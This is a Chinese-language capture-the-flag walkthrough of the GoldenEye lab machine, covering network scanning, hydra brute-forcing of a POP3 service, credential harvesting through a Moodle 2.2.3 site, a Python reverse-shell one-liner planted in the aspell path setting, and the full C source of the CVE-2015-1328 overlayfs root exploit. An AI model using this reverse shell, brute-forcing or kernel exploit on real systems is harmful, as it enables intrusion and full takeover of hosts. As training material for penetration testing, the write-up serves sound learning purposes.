GoldenEye

新年第一靶

用到的虚拟机是kali2022和1-GoldenEye-v1，两个网络环境设置成NAT模式，确保在同一个网段

信息收集

存活主机信息收集

首先进行信息收集，扫描同网段存活主机。可以先ifconfig看一下kali的网卡信息：

┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.4.130  netmask 255.255.255.0  broadcast 192.168.4.255
        inet6 fe80::20c:29ff:febb:3f71  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bb:3f:71  txqueuelen 1000  (Ethernet)
        RX packets 9  bytes 1285 (1.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 32  bytes 3828 (3.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

发现是192.168.4.130，以下两种方式来扫描存活主机：

方式1.arp-scan -l
方式2.nmap -sn 192.168.4.0/24

方式1的扫描结果：

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo arp-scan -l          
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:3f:71, IPv4: 192.168.4.130
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.4.2     00:50:56:f2:00:29       VMware, Inc.
192.168.4.100   00:50:56:c0:00:08       VMware, Inc.
192.168.4.129   00:0c:29:b1:3c:e5       VMware, Inc.
192.168.4.254   00:50:56:e4:b5:6f       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 4 responded

方式2的扫描结果：

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.4.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:21 EST
Nmap scan report for 192.168.4.2
Host is up (0.00019s latency).
Nmap scan report for 192.168.4.100
Host is up (0.00017s latency).
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00027s latency).
Nmap scan report for 192.168.4.130
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.62 seconds                                                   

端口信息收集

接着对存活主机进行端口信息收集

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.2       
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:24 EST
Nmap scan report for 192.168.4.2
Host is up (0.00011s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
                                                                                                                                        
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.100
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:24 EST
Nmap scan report for 192.168.4.100
Host is up (0.00010s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
902/tcp open  iss-realsecure
912/tcp open  apex-mesh

Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds
                                                                                                                                        
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:25 EST
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
                                                                                                                                        
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 192.168.4.254
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:25 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.03 seconds                                                                           

经过测试，发现192.168.4.129是目标靶机，目前初步看是开放了25、80端口，可以访问看一下http服务：

有几处有用信息，首先给了另外一个资源请求的url:/sev-home/，另外terminal.js里面有一处注释：

//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

InvincibleHack3r 解码一下可以得到

InvincibleHack3r；再结合这段描述，可能Boris/Natalya 就是对应InvincibleHack3r的user，我们再去访问192.168.4.129/sev-home,需要账号密码进行登录，这里多次尝试，最终登录密码为boris/InvincibleHack3r；所以大小写都需要尝试一下

登录进去之后给了一段信息：

GoldenEye

GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

看提示是说有个pop3服务运行在了非常规端口上面，所以这里需要进行一个全端口扫描：

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p 1-65535 192.168.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-20 03:40 EST
Nmap scan report for severnaya-station.com (192.168.4.129)
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

pop3爆破

POP3（Post Office Protocol 3，邮局协议第三版）是一种用于接收电子邮件的协议，属于TCP/IP协议族的一部分，默认端口为110（加密连接通常使用995端口）。它是电子邮件系统中最常用的接收邮件协议之一，与SMTP协议配合使用，完成邮件的发送与接收。
POP3的主要功能是允许用户通过邮件客户端（如Outlook、Thunderbird等）从邮件服务器下载邮件到本地设备。下载完成后，邮件通常会从服务器上删除（除非配置为保留副本），因此邮件只能在下载的设备上访问。

到这里，我们可以尝试利用之前得到的两个用户名：Boris/Natalya来进行密码爆破。这里大小写可以都试一下。这里用的kali自带的一个工具hydra ，使用到的命令如下：

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt  192.168.4.129 -s 55007 pop3

注：这里如果是-L，那么后面接的就是字典，username.txt里面放的内容为：

boris
Boris
natalya
Natalya

如果是-l ，那么后面接的就是单个用户名。 -p和-P是同理的。fasttrack.txt是hydra自带的字典。 -s 后面接的pop3运行的端口。

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt  192.168.4.129 -s 55007 pop3
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-20 03:49:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 888 login tries (l:4/p:222), ~56 tries per task
[DATA] attacking pop3://192.168.4.129:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 808 to do in 00:11h, 16 active
[55007][pop3] host: 192.168.4.129   login: Boris   password: secret1!
[55007][pop3] host: 192.168.4.129   login: Natalya   password: bird

得到两组pop3账号密码：Boris/secret1! Natalya/bird

先看一组：

┌──(kali㉿kali)-[~/Desktop]
└─$ nc 192.168.4.129 55007       
+OK GoldenEye POP3 Electronic-Mail System
user Boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921

可以看到存在3封邮件，使用retr 1 ；retr 2; retr 3;一个一个来看，寻找一些有用信息，在Natalya/bird上面登录上去，在一封邮件里面找到：

retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

提取一些有用的信息：

username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

用户名，密码，域名指向，url，我们按照提示，在/etc/hosts 里面添加一条：

192.168.4.129   severnaya-station.com

然后再去访问 severnaya-station.com/gnocertdir

可以访问到内容了，我们尝试用邮件里面的账号密码来进行登录：xenia/RCP90rulez!，可以发现成功登入，接下来也是进行一些信息的挖掘。

翻一下信息可以发现是moodle 2.2.3版本，可以google搜索一下有没有哪些poc可以用。另外还有一个有用信息在home->myprofile->messages

Recent conversations
Picture of Dr DoakDr DoakAdd contactBlock contactMessage history24/04/18, 21:24Greetings Xenia, As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here. My email username is... doak Thank you, Cheers, Dr. Doak "The Doctor" Training Scientist - Sr Level Training Operating Supervisor GoldenEye Operations Center Sector Level 14 - NO2 - id:998623-1334 Campus 4, Building 57, Floor -8, Sector 6, cube 1,007 Phone 555-193-826 Cell 555-836-0944 Office 555-846-9811 Personal 555-826-9923 Email: doak@ Please Recycle before you print, Stay Green aka save the company money! "There's such a thing as Good Grief. Just ask Charlie Brown" - someguy "You miss 100% of the shots you don't shoot at" - Wayne G. THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
View: this conversation

My email username is ....doak，可以根据doak这个用户名对pop3服务再进行爆破：hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.4.129 -s 55007 pop3 得到doak/goat，再用这个账号秘密吗登pop3上面看信件，

└─$ nc 192.168.4.129 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list 
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

得到dr_doak/4England!。

管理员登录moodle

再用这个去登录到moodle 2.2.3框架。登上去也是进行一通信息收集，可以发现home->my profile ->my private files里面可以看到s3cert.txt，里面的内容为：

007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

根据提示去访问:severnaya-station.com/dir007key/for-007.jpg，得到一张图片，保存下来，分析一下图片隐藏的信息，这里可以用010hex，或者strings 可以发现一段base64编码：

这段base64解码一下得到：xWinter1995x!，用admin/xWinter1995x!再去登录moodle cms，发现成功登录。并且是管理员权限。

命令执行反弹shell

搜索一下可以发现moodle 2.2.3是存在命令执行漏洞的，这里的利用可以直接用msf的框架。但是我这里尝试了发现利用不成功。

于是切到手动：

在home->site administration->server->system paths下的 path to aspell去弹shell

目标靶机是存在python环境的，这里可以用python来弹:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.130",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在kali上监听8888端口即可，注意这里要把Spell engine改成PSpellShell

然后在 Home->My profile -> Blogs -> Add a new entry 随便编辑一下去触发。

可以发现反弹到shell了，为了方便看，可以开一个tty终端: python -c 'import pty; pty.spawn("/bin/bash")' ，拿到的权限是www-data权限。

提权

这里用到的提权是linux内核提权，通过uname -a发现版本为3.13.0-32-generic

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

谷歌搜索一下也可以发现有类似的linux内核提权脚本，只不过这里的脚本需要修改一下：

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

需要将lib=system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); 这一行的gcc 改成 cc，改之后的：lib=system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); 这脚本放到kali里面，然后起一个http服务：python -m http.server 9999，然后用靶机的wget命令去下载kali的提权脚本。

可以发现成功下载到我们的靶机上面了，接下来就是需要去编译成可执行文件，执行就行了。

cc -o exp 37292.c 把37292.c文件编译成exp可执行文件，然后运行./exp ，运行完之后执行命令whoami发现已经提权为root

拿最终flag

这个题目的flag作为隐藏文件放在了/root下面，所以需要cd /root下面，然后 ls -la 显示所有文件来找到。最后cat .flag.txt拿到最终的flag。